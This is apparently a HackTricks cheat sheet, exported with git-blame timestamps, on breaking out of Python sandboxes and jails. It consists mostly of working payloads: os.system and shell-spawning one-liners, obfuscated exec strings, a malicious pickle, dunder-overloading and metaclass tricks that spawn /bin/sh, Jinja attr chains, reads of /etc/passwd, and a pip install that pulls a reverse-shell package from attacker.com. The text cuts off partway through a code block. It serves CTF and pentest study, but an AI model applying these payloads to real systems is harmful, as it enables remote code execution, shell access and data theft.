2022-07-02 18:05:33 +00:00
# Bypass Python sandboxes
2022-04-28 16:01:33 +00:00
< details >
2023-12-30 20:49:23 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-30 20:49:23 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-09-30 10:43:59 +00:00
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-12-30 20:49:23 +00:00
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-06 03:10:38 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2023-12-30 20:49:23 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2023-09-02 23:51:32 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free** ](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks ) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
***
2020-07-15 15:43:14 +00:00
These are some tricks to bypass python sandbox protections and execute arbitrary commands.
2022-07-02 18:05:33 +00:00
## Command Execution Libraries
2020-07-15 15:43:14 +00:00
The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
```python
os.system("ls")
os.popen("ls").read()
commands.getstatusoutput("ls")
commands.getoutput("ls")
commands.getstatus("file/path")
subprocess.call("ls", shell=True)
subprocess.Popen("ls", shell=True)
pty.spawn("ls")
pty.spawn("/bin/bash")
2021-02-03 23:03:54 +00:00
platform.os.system("ls")
2021-10-06 00:19:16 +00:00
pdb.os.system("ls")
2020-07-15 15:43:14 +00:00
2021-06-24 23:53:47 +00:00
#Import functions to execute commands
importlib.import_module("os").system("ls")
importlib.__import__("os").system("ls")
imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")
imp.os.system("ls")
imp.sys.modules["os"].system("ls")
sys.modules["os"].system("ls")
__import__("os").system("ls")
import os
from os import *
2020-07-15 15:43:14 +00:00
#Other interesting functions
open("/etc/passwd").read()
open('/var/www/html/input', 'w').write('123')
2021-06-24 23:53:47 +00:00
#In Python2.7
execfile('/usr/lib/python2.7/os.py')
system('ls')
2020-07-15 15:43:14 +00:00
```
2021-06-24 23:53:47 +00:00
Remember that the _**open**_ and _**read**_ functions can be useful to **read files** inside the python sandbox and to **write some code** that you could **execute** to **bypass** the sandbox.
2020-07-15 15:43:14 +00:00
2021-06-24 23:53:47 +00:00
{% hint style="danger" %}
2022-09-12 21:12:49 +00:00
**Python2 input()** function allows executing python code before the program crashes.
2021-06-24 23:53:47 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . . / . . / . gitbook / assets / image ( 552 ) . png > )
2020-07-15 15:43:14 +00:00
2022-09-12 21:12:49 +00:00
## Bypass pickle sandbox with the default installed python packages
2021-02-05 00:28:18 +00:00
2022-07-02 18:05:33 +00:00
### Default packages
2021-02-05 00:28:18 +00:00
2021-10-18 11:21:18 +00:00
You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html ](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html )\
2021-11-30 16:46:07 +00:00
Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
2022-09-12 21:12:49 +00:00
For example, the following pickle, when loaded, is going to import the pip library to use it:
2021-02-05 00:28:18 +00:00
```python
#Note that here we are importing the pip library so the pickle is created correctly
2022-09-12 21:12:49 +00:00
#however, the victim doesn't even need to have the library installed to execute it
2021-02-05 00:28:18 +00:00
#the library is going to be loaded automatically
import pickle, os, base64, pip
class P(object):
def __reduce__ (self):
return (pip.main,(["list"],))
print(base64.b64encode(pickle.dumps(P(), protocol=0)))
```
2022-09-12 21:12:49 +00:00
For more information about how pickle works check this: [https://checkoway.net/musings/pickle/ ](https://checkoway.net/musings/pickle/ )
2021-02-05 00:36:31 +00:00
2022-07-02 18:05:33 +00:00
### Pip package
2021-02-05 00:28:18 +00:00
2021-11-23 09:46:40 +00:00
Trick shared by ** @isHaacK **
2022-09-12 21:12:49 +00:00
If you have access to `pip` or `pip.main()` you can install an arbitrary package and obtain a reverse shell calling:
2021-02-05 00:28:18 +00:00
```bash
pip install http://attacker.com/Rerverse.tar.gz
pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
```
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell** :
2023-06-06 22:57:49 +00:00
{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
2021-02-05 00:28:18 +00:00
2021-02-05 08:59:17 +00:00
{% hint style="info" %}
2022-09-12 21:12:49 +00:00
This package is called `Reverse` . However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
2021-02-05 08:59:17 +00:00
{% endhint %}
2022-07-02 18:05:33 +00:00
## Eval-ing python code
2020-07-15 15:43:14 +00:00
2022-07-05 11:06:01 +00:00
{% hint style="warning" %}
Note that exec allows multiline strings and ";", but eval doesn't (check walrus operator)
{% endhint %}
2022-09-12 21:12:49 +00:00
If certain characters are forbidden you can use the **hex/octal/B64** representation to **bypass** the restriction:
2020-07-15 15:43:14 +00:00
```python
exec("print('RCE'); __import__ ('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
eval("__import__('os').system('ls')") #Eval doesn't allow ";"
eval(compile('print("hello world"); print("heyy")', '< stdin > ', 'exec')) #This way eval accept ";"
__import__('timeit').timeit("__import__('os').system('ls')",number=1)
#One liners that allow new lines and tabs
eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '< stdin > ', 'exec'))
exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '< stdin > ', 'exec'))
```
```python
#Octal
exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")
#Hex
2023-04-14 11:17:09 +00:00
exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")
2020-07-15 15:43:14 +00:00
#Base64
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
2023-01-22 23:51:23 +00:00
### Other libraries that allow to eval python code
```python
#Pandas
import pandas as pd
df = pd.read_csv("currency-rates.csv")
df.query('@__builtins__.__import__("os").system("ls")')
df.query("@pd.io.common.os.popen('ls').read()")
df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")
# The previous options work but others you might try give the error:
# Only named functions are supported
# Like:
df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")
```
2022-07-05 11:06:01 +00:00
## Operators and short tricks
```python
2022-09-12 21:12:49 +00:00
# walrus operator allows generating variable inside a list
2022-07-05 11:06:01 +00:00
## everything will be executed in order
## From https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/
[a:=21,a*2]
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"
```
2023-01-13 17:40:30 +00:00
## Bypassing protections through encodings (UTF-7)
In [**this writeup** ](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy ) UFT-7 is used to load and execute arbitrary python code inside an apparent sandbox:
```python
assert b"+AAo-".decode("utf_7") == "\n"
payload = """
# -*- coding: utf_7 -*-
def f(x):
return x
#+AAo-print(open("/flag.txt").read())
""".lstrip()
```
It is also possible to bypass it using other encodings, e.g. `raw_unicode_escape` and `unicode_escape` .
2022-07-02 18:05:33 +00:00
## Python execution without calls
2022-09-12 21:12:49 +00:00
If you are inside a python jail that **doesn't allow you to make calls** , there are still some ways to **execute arbitrary functions, code** and **commands** .
2022-07-03 20:38:21 +00:00
2022-07-05 10:47:46 +00:00
### RCE with [decorators](https://docs.python.org/3/glossary.html#term-decorator)
2022-07-03 20:38:21 +00:00
```python
2022-07-05 10:47:46 +00:00
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
@exec
@input
class X:
pass
# The previous code is equivalent to:
class X:
pass
X = input(X)
X = exec(X)
2022-09-12 21:12:49 +00:00
# So just send your python code when prompted and it will be executed
2022-07-05 10:47:46 +00:00
# Another approach without calling input:
2022-07-03 20:38:21 +00:00
@eval
@'__import__("os").system("sh")'.format
class _:pass
```
2022-07-05 10:47:46 +00:00
### RCE creating objects and overloading
2022-09-12 21:12:49 +00:00
If you can **declare a class** and **create an object** of that class you could **write/overwrite different methods** that can be **triggered** **without** **needing to call them directly** .
2022-07-05 10:47:46 +00:00
#### RCE with custom classes
You can modify some **class methods** (_by overwriting existing class methods or creating a new class_) to make them **execute arbitrary code** when **triggered** without calling them directly.
2022-07-02 18:05:33 +00:00
```python
2022-09-12 21:12:49 +00:00
# This class has 3 different ways to trigger RCE without directly calling any function
2022-07-05 10:47:46 +00:00
class RCE:
def __init__ (self):
2022-07-05 10:49:47 +00:00
self += "print('Hello from __init__ + __iadd__ ')"
2022-07-05 10:47:46 +00:00
__iadd__ = exec #Triggered when object is created
2022-07-05 10:49:47 +00:00
def __del__ (self):
self -= "print('Hello from __del__ + __isub__ ')"
__isub__ = exec #Triggered when object is created
2022-07-05 10:47:46 +00:00
__getitem__ = exec #Trigerred with obj[< argument > ]
__add__ = exec #Triggered with obj + < argument >
2022-07-05 11:06:01 +00:00
# These lines abuse directly the previous class to get RCE
2022-07-05 10:49:47 +00:00
rce = RCE() #Later we will see how to create objects without calling the constructor
2022-07-05 10:47:46 +00:00
rce["print('Hello from __getitem__ ')"]
rce + "print('Hello from __add__ ')"
2022-07-05 10:49:47 +00:00
del rce
2022-07-05 10:47:46 +00:00
2022-07-05 11:06:01 +00:00
# These lines will get RCE when the program is over (exit)
sys.modules["pwnd"] = RCE()
exit()
# Other functions to overwrite
2022-07-05 10:47:46 +00:00
__sub__ (k - 'import os; os.system("sh")')
__mul__ (k * 'import os; os.system("sh")')
__floordiv__ (k // 'import os; os.system("sh")')
__truediv__ (k / 'import os; os.system("sh")')
__mod__ (k % 'import os; os.system("sh")')
__pow__ (k**'import os; os.system("sh")')
__lt__ (k < 'import os; os.system("sh")')
__le__ (k < = 'import os; os.system("sh")')
__eq__ (k == 'import os; os.system("sh")')
__ne__ (k != 'import os; os.system("sh")')
__ge__ (k >= 'import os; os.system("sh")')
__gt__ (k > 'import os; os.system("sh")')
__iadd__ (k += 'import os; os.system("sh")')
__isub__ (k -= 'import os; os.system("sh")')
__imul__ (k *= 'import os; os.system("sh")')
__ifloordiv__ (k //= 'import os; os.system("sh")')
__idiv__ (k /= 'import os; os.system("sh")')
__itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.)
__imod__ (k %= 'import os; os.system("sh")')
__ipow__ (k ** = 'import os; os.system("sh")')
__ilshift__ (k< < = 'import os; os.system("sh")')
__irshift__ (k >>= 'import os; os.system("sh")')
__iand__ (k = 'import os; os.system("sh")')
__ior__ (k |= 'import os; os.system("sh")')
__ixor__ (k ^= 'import os; os.system("sh")')
```
#### Crating objects with [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses)
2022-09-12 21:12:49 +00:00
The key thing that metaclasses allow us to do is **make an instance of a class, without calling the constructor** directly, by creating a new class with the target class as a metaclass.
2022-07-05 10:47:46 +00:00
```python
# Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed
2022-09-12 21:12:49 +00:00
# This will define the members of the "subclass"
2022-07-05 10:47:46 +00:00
class Metaclass(type):
__getitem__ = exec # So Sub[string] will execute exec(string)
# Note: Metaclass.__class__ == type
class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass
pass # Nothing special to do
Sub['import os; os.system("sh")']
## You can also use the tricks from the previous section to get RCE with this object
```
#### Creating objects with exceptions
2022-09-12 21:12:49 +00:00
When an **exception is triggered** an object of the **Exception** is **created** without you needing to call the constructor directly (a trick from [**@\_nag0mez** ](https://mobile.twitter.com/\_nag0mez )):
2022-07-05 10:47:46 +00:00
```python
class RCE(Exception):
def __init__ (self):
self += 'import os; os.system("sh")'
__iadd__ = exec #Triggered when object is created
raise RCE #Generate RCE object
2022-07-02 18:05:33 +00:00
2022-09-12 21:12:49 +00:00
# RCE with __add__ overloading and try/except + raise generated object
2022-07-05 10:47:46 +00:00
class Klecko(Exception):
__add__ = exec
2022-07-02 18:05:33 +00:00
try:
raise Klecko
except Klecko as k:
2022-07-05 10:47:46 +00:00
k + 'import os; os.system("sh")' #RCE abusing __add__
## You can also use the tricks from the previous section to get RCE with this object
```
### More RCE
```python
# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
# If sys is imported, you can sys.excepthook and trigger it by triggering an error
class X:
def __init__ (self, a, b, c):
self += "os.system('sh')"
__iadd__ = exec
sys.excepthook = X
1/0 #Trigger it
# From https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py
# The interpreter will try to import an apt-specific module to potentially
# report an error in ubuntu-provided modules.
2022-09-12 21:12:49 +00:00
# Therefore the __import__ functions are overwritten with our RCE
2022-07-05 10:47:46 +00:00
class X():
def __init__ (self, a, b, c, d, e):
self += "print(open('flag').read())"
__iadd__ = eval
__builtins__.__import__ = X
{}[1337]
2022-07-02 18:05:33 +00:00
```
2022-07-05 10:47:46 +00:00
### Read file with builtins help & license
2022-07-03 20:38:21 +00:00
```python
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__ .help
a.__class__.__enter__ = __builtins__ .__dict__["license"]
a.__class__.__exit__ = lambda self, *args: None
with (a as b):
pass
```
2023-09-02 23:51:32 +00:00
< figure > < img src = "/.gitbook/assets/image (675).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free** ](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks ) today.
2022-08-31 22:35:39 +00:00
2023-09-02 23:48:41 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
2022-08-31 22:35:39 +00:00
2023-09-02 23:48:41 +00:00
***
2022-08-31 22:35:39 +00:00
2022-07-02 18:05:33 +00:00
## Builtins
2020-07-15 15:43:14 +00:00
2022-04-05 22:24:52 +00:00
* [**Builtins functions of python2** ](https://docs.python.org/2/library/functions.html )
* [**Builtins functions of python3** ](https://docs.python.org/3/library/functions.html )
2020-07-15 15:43:14 +00:00
2022-09-12 21:12:49 +00:00
If you can access the ** `__builtins__` ** object you can import libraries (notice that you could also use here other string representation shown in the last section):
2020-07-15 15:43:14 +00:00
```python
2021-10-06 00:19:16 +00:00
__builtins__.__import__("os").system("ls")
2020-07-15 15:43:14 +00:00
__builtins__.__dict__['__import__']("os").system("ls")
```
2022-07-02 18:05:33 +00:00
### No Builtins
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open` , `import` , `print` ...) **aren't loaded** .\
2022-09-12 21:12:49 +00:00
However, **by default python imports a lot of modules in memory** . These modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution** .
2021-06-24 23:53:47 +00:00
In the following examples you can observe how to **abuse** some of this "**benign**" modules loaded to **access** **dangerous** **functionalities** inside of them.
2020-07-15 15:43:14 +00:00
**Python2**
```python
#Try to reload __builtins__
reload(__builtins__)
import __builtin__
# Read recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
# Write recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
# Execute recovering __import__ (class 59s is <class 'warnings.catch_warnings'>)
().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')
# Execute (another method)
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
# Execute recovering eval symbol (class 59 is <class 'warnings.catch_warnings'>)
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")
# Or you could obtain the builtins from a defined function
get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
```
2022-07-02 18:05:33 +00:00
#### Python3
2020-07-15 15:43:14 +00:00
```python
2021-10-04 11:09:20 +00:00
# Obtain builtins from a globally defined function
2022-05-01 12:41:36 +00:00
# https://docs.python.org/3/library/functions.html
2023-11-05 18:13:54 +00:00
help.__call__.__builtins__ # or __globals__
license.__call__.__builtins__ # or __globals__
credits.__call__.__builtins__ # or __globals__
2021-10-04 11:09:20 +00:00
print.__self__
dir.__self__
globals.__self__
2021-10-06 00:19:16 +00:00
len.__self__
2023-11-05 18:13:54 +00:00
__build_class__.__self__
2021-01-18 08:31:03 +00:00
2021-10-04 11:09:20 +00:00
# Obtain the builtins from a defined function
get_flag.__globals__['__builtins__']
2021-06-24 23:53:47 +00:00
2022-09-12 21:12:49 +00:00
# Get builtins from loaded classes
2021-10-06 00:19:16 +00:00
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]
2021-01-18 08:31:03 +00:00
```
2021-11-30 16:46:07 +00:00
[**Below there is a bigger function** ](./#recursive-search-of-builtins-globals ) to find tens/**hundreds** of **places** were you can find the **builtins** .
2021-10-06 00:19:16 +00:00
2022-07-02 18:05:33 +00:00
#### Python2 and Python3
2021-01-18 08:31:03 +00:00
```python
2022-09-12 21:12:49 +00:00
# Recover __builtins__ and make everything easier
2021-10-06 00:19:16 +00:00
__builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__
2021-01-18 08:31:03 +00:00
__builtins__["__import__"]('os').system('ls')
2020-07-15 15:43:14 +00:00
```
2022-07-02 18:05:33 +00:00
### Builtins payloads
2021-10-04 11:09:20 +00:00
```python
# Possible payloads once you have found the builtins
2022-11-05 10:56:30 +00:00
__builtins__["open"]("/etc/passwd").read()
__builtins__["__import__"]("os").system("ls")
2022-09-12 21:12:49 +00:00
# There are lots of other payloads that can be abused to execute commands
2021-10-06 00:19:16 +00:00
# See them below
2021-10-04 11:09:20 +00:00
```
2022-07-02 18:05:33 +00:00
## Globals and locals
2021-06-25 13:52:40 +00:00
Checking the ** `globals` ** and ** `locals` ** is a good way to know what you can access.
```python
>>> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': < class ' _frozen_importlib . BuiltinImporter ' > , '__spec__': None, '__annotations__': {}, '__builtins__': < module ' builtins ' ( built-in ) > , 'attr': < module ' attr ' from ' / usr / local / lib / python3 . 9 / site-packages / attr . py ' > , 'a': < class ' importlib . abc . Finder ' > , 'b': < class ' importlib . abc . MetaPathFinder ' > , 'c': < class ' str ' > , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', < class ' DeprecationWarning ' > , 1): True}, 'z': < class ' str ' > }
>>> locals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': < class ' _frozen_importlib . BuiltinImporter ' > , '__spec__': None, '__annotations__': {}, '__builtins__': < module ' builtins ' ( built-in ) > , 'attr': < module ' attr ' from ' / usr / local / lib / python3 . 9 / site-packages / attr . py ' > , 'a': < class ' importlib . abc . Finder ' > , 'b': < class ' importlib . abc . MetaPathFinder ' > , 'c': < class ' str ' > , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', < class ' DeprecationWarning ' > , 1): True}, 'z': < class ' str ' > }
2021-10-06 00:19:16 +00:00
# Obtain globals from a defined function
get_flag.__globals__
2021-10-06 09:50:35 +00:00
# Obtain globals from an object of a class
class_obj.__init__.__globals__
2021-10-06 00:19:16 +00:00
# Obtaining globals directly from loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ]
[< class ' function ' > ]
# Obtaining globals from __init__ of loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ]
[< class ' _frozen_importlib . _ModuleLock ' > , < class ' _frozen_importlib . _DummyModuleLock ' > , < class ' _frozen_importlib . _ModuleLockManager ' > , < class ' _frozen_importlib . ModuleSpec ' > , < class ' _frozen_importlib_external . FileLoader ' > , < class ' _frozen_importlib_external . _NamespacePath ' > , < class ' _frozen_importlib_external . _NamespaceLoader ' > , < class ' _frozen_importlib_external . FileFinder ' > , < class ' zipimport . zipimporter ' > , < class ' zipimport . _ZipImportResourceReader ' > , < class ' codecs . IncrementalEncoder ' > , < class ' codecs . IncrementalDecoder ' > , < class ' codecs . StreamReaderWriter ' > , < class ' codecs . StreamRecoder ' > , < class ' os . _wrap_close ' > , < class ' _sitebuiltins . Quitter ' > , < class ' _sitebuiltins . _Printer ' > , < class ' types . DynamicClassAttribute ' > , < class ' types . _GeneratorWrapper ' > , < class ' warnings . WarningMessage ' > , < class ' warnings . catch_warnings ' > , < class ' reprlib . Repr ' > , < class ' functools . partialmethod ' > , < class ' functools . singledispatchmethod ' > , < class ' functools . cached_property ' > , < class ' contextlib . _GeneratorContextManagerBase ' > , < class ' contextlib . _BaseExitStack ' > , < class ' sre_parse . State ' > , < class ' sre_parse . SubPattern ' > , < class ' sre_parse . Tokenizer ' > , < class ' re . Scanner ' > , < class ' rlcompleter . Completer ' > , < class ' dis . Bytecode ' > , < class ' string . Template ' > , < class ' cmd . Cmd ' > , < class ' tokenize . Untokenizer ' > , < class ' inspect . BlockFinder ' > , < class ' inspect . Parameter ' > , < class ' inspect . BoundArguments ' > , < class ' inspect . Signature ' > , < class ' bdb . Bdb ' > , < class ' bdb . Breakpoint ' > , < class ' traceback . FrameSummary ' > , < class ' traceback . TracebackException ' > , < class ' __future__ . _Feature ' > , < class ' codeop . Compile ' > , < class ' codeop . CommandCompiler ' > , < class ' code . InteractiveInterpreter ' > , < class ' pprint . _safe_key ' > , < class ' pprint . PrettyPrinter ' > , < class ' _weakrefset . _IterationGuard ' > , < class ' _weakrefset . WeakSet ' > , < class ' threading . _RLock ' > , < class ' threading . Condition ' > , < class ' threading . Semaphore ' > , < class ' threading . Event ' > , < class ' threading . Barrier ' > , < class ' threading . Thread ' > , < class ' subprocess . CompletedProcess ' > , < class ' subprocess . Popen ' > ]
2022-05-01 12:41:36 +00:00
# Without the use of the dir() function
2021-10-06 00:19:16 +00:00
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[< class ' _frozen_importlib . _ModuleLock ' > , < class ' _frozen_importlib . _DummyModuleLock ' > , < class ' _frozen_importlib . _ModuleLockManager ' > , < class ' _frozen_importlib . ModuleSpec ' > , < class ' _frozen_importlib_external . FileLoader ' > , < class ' _frozen_importlib_external . _NamespacePath ' > , < class ' _frozen_importlib_external . _NamespaceLoader ' > , < class ' _frozen_importlib_external . FileFinder ' > , < class ' zipimport . zipimporter ' > , < class ' zipimport . _ZipImportResourceReader ' > , < class ' codecs . IncrementalEncoder ' > , < class ' codecs . IncrementalDecoder ' > , < class ' codecs . StreamReaderWriter ' > , < class ' codecs . StreamRecoder ' > , < class ' os . _wrap_close ' > , < class ' _sitebuiltins . Quitter ' > , < class ' _sitebuiltins . _Printer ' > , < class ' types . DynamicClassAttribute ' > , < class ' types . _GeneratorWrapper ' > , < class ' warnings . WarningMessage ' > , < class ' warnings . catch_warnings ' > , < class ' reprlib . Repr ' > , < class ' functools . partialmethod ' > , < class ' functools . singledispatchmethod ' > , < class ' functools . cached_property ' > , < class ' contextlib . _GeneratorContextManagerBase ' > , < class ' contextlib . _BaseExitStack ' > , < class ' sre_parse . State ' > , < class ' sre_parse . SubPattern ' > , < class ' sre_parse . Tokenizer ' > , < class ' re . Scanner ' > , < class ' rlcompleter . Completer ' > , < class ' dis . Bytecode ' > , < class ' string . Template ' > , < class ' cmd . Cmd ' > , < class ' tokenize . Untokenizer ' > , < class ' inspect . BlockFinder ' > , < class ' inspect . Parameter ' > , < class ' inspect . BoundArguments ' > , < class ' inspect . Signature ' > , < class ' bdb . Bdb ' > , < class ' bdb . Breakpoint ' > , < class ' traceback . FrameSummary ' > , < class ' traceback . TracebackException ' > , < class ' __future__ . _Feature ' > , < class ' codeop . Compile ' > , < class ' codeop . CommandCompiler ' > , < class ' code . InteractiveInterpreter ' > , < class ' pprint . _safe_key ' > , < class ' pprint . PrettyPrinter ' > , < class ' _weakrefset . _IterationGuard ' > , < class ' _weakrefset . WeakSet ' > , < class ' threading . _RLock ' > , < class ' threading . Condition ' > , < class ' threading . Semaphore ' > , < class ' threading . Event ' > , < class ' threading . Barrier ' > , < class ' threading . Thread ' > , < class ' subprocess . CompletedProcess ' > , < class ' subprocess . Popen ' > ]
2021-06-25 13:52:40 +00:00
```
2021-11-30 16:46:07 +00:00
[**Below there is a bigger function** ](./#recursive-search-of-builtins-globals ) to find tens/**hundreds** of **places** were you can find the **globals** .
2021-10-06 00:19:16 +00:00
2022-07-02 18:05:33 +00:00
## Discover Arbitrary Execution
2021-06-24 23:53:47 +00:00
2021-11-30 16:46:07 +00:00
Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
2021-06-25 13:39:46 +00:00
2022-07-02 18:05:33 +00:00
#### Accessing subclasses with bypasses
2021-06-25 13:39:46 +00:00
2022-09-12 21:12:49 +00:00
One of the most sensitive parts of this technique is being able to **access the base subclasses** . In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways** :
2021-06-25 13:39:46 +00:00
```python
#You can access the base from mostly anywhere (in regular conditions)
2021-10-06 00:19:16 +00:00
"".__class__.__base__.__subclasses__()
2021-06-25 13:39:46 +00:00
[].__class__.__base__.__subclasses__()
{}.__class__.__base__.__subclasses__()
().__class__.__base__.__subclasses__()
2021-10-06 00:19:16 +00:00
(1).__class__.__base__.__subclasses__()
2021-06-25 13:39:46 +00:00
bool.__class__.__base__.__subclasses__()
2021-10-06 00:19:16 +00:00
print.__class__.__base__.__subclasses__()
open.__class__.__base__.__subclasses__()
defined_func.__class__.__base__.__subclasses__()
2021-06-25 13:39:46 +00:00
#You can also access it without "__base__" or "__class__"
2022-05-01 12:41:36 +00:00
# You can apply the previous technique also here
2021-06-25 13:39:46 +00:00
"".__class__.__bases__[0].__subclasses__()
"".__class__.__mro__[1].__subclasses__()
"".__getattribute__("__class__").mro()[1].__subclasses__()
"".__getattribute__("__class__").__base__.__subclasses__()
2023-11-12 23:00:08 +00:00
# This can be useful in case it is not possible to make calls (therefore using decorators)
().__class__.__class__.__subclasses__(().__class__.__class__)[0].register.__builtins__["breakpoint"]() # From https://github.com/salvatore-abello/python-ctf-cheatsheet/tree/main/pyjails#no-builtins-no-mro-single-exec
2022-09-12 21:12:49 +00:00
#If attr is present you can access everything as a string
# This is common in Django (and Jinja) environments
2021-06-25 13:39:46 +00:00
(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
```
2022-07-02 18:05:33 +00:00
### Finding dangerous libraries loaded
2021-06-25 13:39:46 +00:00
2021-06-24 23:53:47 +00:00
For example, knowing that with the library ** `sys` ** it's possible to **import arbitrary libraries** , you can search for all the **modules loaded that have imported sys inside of them** :
```python
